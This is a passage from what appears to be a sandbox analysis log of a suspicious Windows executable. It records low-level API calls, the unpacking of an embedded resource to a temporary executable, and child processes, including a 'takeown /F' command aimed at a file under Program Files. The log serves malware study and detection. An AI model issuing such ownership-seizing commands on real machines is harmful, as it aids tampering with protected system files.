Flags=0x8, Size=0x2a) returned 0x5b75d0 [0246.643] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x3c) returned 0x5b84a0 [0246.643] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x54) returned 0x5b7608 [0246.643] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x24) returned 0x5b7668 [0246.643] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x30) returned 0x5b7698 [0246.643] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x8c) returned 0x5b76d0 [0246.643] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b7828 | out: hHeap=0x5a0000) returned 1 [0246.644] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x800) returned 0x5b93b0 [0246.644] GetLastError () returned 0x0 [0246.644] SetLastError (dwErrCode=0x0) [0246.644] GetLastError () returned 0x0 [0246.644] SetLastError (dwErrCode=0x0) [0246.644] GetLastError () returned 0x0 [0246.644] SetLastError (dwErrCode=0x0) [0246.644] GetACP () returned 0x4e4 [0246.644] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x220) returned 0x5b9bb8 [0246.644] GetLastError () returned 0x0 [0246.644] SetLastError (dwErrCode=0x0) [0246.644] IsValidCodePage (CodePage=0x4e4) returned 1 [0246.644] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0246.644] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0246.644] GetLastError () returned 0x0 [0246.644] SetLastError (dwErrCode=0x0) [0246.644] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0246.644] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0246.644] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0246.644] GetLastError () returned 0x0 [0246.644] SetLastError (dwErrCode=0x0) [0246.644] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0246.644] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0246.645] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0246.645] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0246.645] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÙQEÂäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0246.645] GetLastError () returned 0x0 [0246.645] SetLastError (dwErrCode=0x0) [0246.645] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0246.645] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0246.645] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0246.645] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0246.645] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÙQEÂäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0246.645] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x80) returned 0x5b9de0 [0246.645] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0246.645] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0246.645] RtlSizeHeap (HeapHandle=0x5a0000, Flags=0x0, MemoryPointer=0x5b9de0) returned 0x80 [0246.646] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0246.646] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0246.646] GetCurrentProcess () returned 0xffffffff [0246.646] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0246.646] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0246.646] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0246.646] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0246.646] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0246.646] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0246.646] LockResource (hResData=0x43c648) returned 0x43c648 [0246.646] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x18) returned 0x5b9e68 [0246.646] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0246.647] GetLastError () returned 0x20 [0246.647] GetLastError () returned 0x20 [0246.647] SetLastError (dwErrCode=0x20) [0246.647] GetLastError () returned 0x20 [0246.647] SetLastError (dwErrCode=0x20) [0246.647] GetLastError () returned 0x20 [0246.647] SetLastError (dwErrCode=0x20) [0246.647] GetLastError () returned 0x20 [0246.647] SetLastError (dwErrCode=0x20) [0246.647] GetLastError () returned 0x20 [0246.647] SetLastError (dwErrCode=0x20) [0246.647] GetLastError () returned 0x20 [0246.647] SetLastError (dwErrCode=0x20) [0246.647] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1000) returned 0x5b9e88 [0246.648] WriteFile (in: hFile=0x80, lpBuffer=0x18ea08*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e334, lpOverlapped=0x0 | out: lpBuffer=0x18ea08*, lpNumberOfBytesWritten=0x18e334*=0x49, lpOverlapped=0x0) returned 1 [0246.649] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b93b0 | out: hHeap=0x5a0000) returned 1 [0246.649] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0246.649] ExitProcess (uExitCode=0x1) [0246.649] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b60b0 | out: hHeap=0x5a0000) returned 1 Process: id = "276" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x14e82000" os_pid = "0x6f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "260" os_parent_pid = "0x1c4" cmd_line = "takeown /F \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 895 os_tid = 0x6dc Thread: id = 897 os_tid = 0xab8 Process: id = "277" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x13cf7000" os_pid = "0x644" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "246" os_parent_pid = "0xad0" cmd_line = "tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 898 os_tid = 0x150 [0248.284] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0248.285] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0248.285] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0248.285] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0248.285] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0248.285] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0248.285] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0248.285] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0248.285] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0248.285] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0248.285] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0248.285] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0248.285] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0248.285] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0248.286] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0248.286] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0248.286] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0248.286] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0248.286] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0248.286] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0248.286] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0248.286] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0248.286] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0248.286] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0248.286] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0248.286] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0248.286] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0248.287] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0248.287] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0248.287] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0248.287] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0248.287] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0248.287] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0248.287] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0248.287] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0248.287] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0248.287] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0248.452] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0248.452] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0248.452] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0248.452] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0248.452] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0248.452] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0248.452] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0248.452] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0248.452] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0248.452] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0248.452] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0248.452] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0248.453] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0248.453] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0248.453] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0248.453] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0248.453] 